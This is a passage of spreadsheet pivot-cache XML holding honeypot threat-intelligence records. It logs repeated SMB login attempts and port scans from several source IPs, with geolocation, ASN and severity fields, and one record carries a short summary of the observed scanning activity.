(jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50381)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50445)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50563)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50682)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50795)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50883)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50998)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,51083)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,51147)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,51279)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,52934)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,52989)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53104)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53178)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53249)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53367)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53494)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53668)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53779)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53829)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,53897)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,54017)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,54072)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,54198)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,54314)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,54375)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,54495)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (jia,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55552)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55707)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55785)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55874)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55962)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56081)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56196)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56293)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56380)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56538)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56625)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56699)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56803)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56959)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57071)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57167)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57264)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57349)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57466)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57533)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57610)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57721)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57819)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57930)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58225)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58339)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58394)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58458)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58571)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58793)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58882)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58973)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59067)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59185)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Cathy,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59254)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (dean,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59320)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58073)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sales,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58267)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58366)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58479)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58562)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58679)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58772)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58875)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58950)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59051)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59168)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59268)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59362)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59462)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59561)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59651)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59870)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59985)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60090)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60191)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60302)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60394)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60504)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60619)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60731)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60846)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,60933)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,61038)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,61140)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,61240)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sam,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,61340)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (samm,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55224)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55379)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55485)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55591)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55676)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55784)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55880)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,55976)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56092)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56188)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56299)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56398)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56501)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56603)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56698)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56800)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56903)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56998)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57082)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57171)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (for,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57373)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57489)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57587)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57676)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57878)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57980)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58087)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58175)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58277)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58360)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58441)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58555)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58654)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58767)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58867)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,58977)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59072)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59183)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59290)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59380)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59483)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,59577)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56352)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,56378)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57128)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57205)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50124)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,50313)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57613)}&amp;&amp;{Data_SMB:Incoming connection (180.222.175.86,57679)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b4de:af56"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1189"/>
    <x v="1189"/>
    <s v="vmi2304972.contaboserver.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-20T18:11:04"/>
    <d v="2024-12-10T04:36:00"/>
    <d v="2025-04-20T18:11:04"/>
    <n v="77"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_H28"/>
    <s v="1433&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Portsmouth"/>
    <s v="Portsmouth"/>
    <s v="2639996"/>
    <s v="PO5"/>
    <s v="50.8198"/>
    <s v="-1.08798"/>
    <s v="51167"/>
    <s v="Contabo GmbH"/>
    <s v="Contabo GmbH"/>
    <s v="hosting"/>
    <s v="Contabo GmbH"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,58511)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,58627)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,59575)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,65142)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,64640)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,64784)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,57943)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,63641)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,63730)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.72.105.39,65379)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5e48:6927"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1190"/>
    <x v="1190"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-20T18:01:17"/>
    <d v="2024-11-23T16:50:09"/>
    <d v="2025-04-20T18:01:17"/>
    <n v="35"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="1433&amp;&amp;3306&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai (Venkatesapuram Colony)"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.0962"/>
    <s v="80.2335"/>
    <s v="134032"/>
    <s v="INFONET COMM ENTERPRISES"/>
    <s v="Infonet Comm Enterprises"/>
    <s v="business"/>
    <s v="Imperial Communication Entrepreneurs PVT LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.58.66.211,54523)}&amp;&amp;{Data_SMB:Incoming connection (103.58.66.211,55942)}&amp;&amp;{Data_SMB:Incoming connection (103.58.66.211,51800)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:673a:42d3"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The activity observed in the logs suggests that an attacker is attempting to probe and exploit various network services and systems, potentially for unauthorized access or data exfiltration. The attacker appears to be using automated tools to scan and test different protocols, including TCP/IP, DNS, FTP, HTTP, HTTPS, IMAP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, PostgreSQL, RDP, Redis, SIP, SMB, SMTP, SNMP, and others. The attacker is likely scanning for open ports and services to identify potential vulnerabilities and entry points. &amp;&amp; The attackers are attempting to scan and exploit various services on the network. They are sending probe requests to different ports, trying to identify open services and potential vulnerabilities. The requests include attempts to connect to printers, databases, file shares, and other services using various protocols such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, SMTP, SNMP, SMB, SIP, and others."/>
    <s v="Some specific observations include: &amp;&amp; Some of the specific attempts include:"/>
  </r>
  <r>
    <x v="1191"/>
    <x v="1191"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-20T17:10:39"/>
    <d v="2025-03-23T11:20:13"/>
    <d v="2025-04-20T17:10:39"/>
    <n v="48"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="29"/>
    <s v="Gwangju"/>
    <s v="NA"/>
    <s v="Gwangju (Jebong-ro)"/>
    <s v="1841811"/>
    <s v="NA"/>
    <s v="35.1518"/>
    <s v="126.919"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b00:871a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1192"/>
    <x v="1192"/>
    <s v="NA&amp;&amp;syn-069-145-168-166.res.spectrum.com"/>
    <x v="0"/>
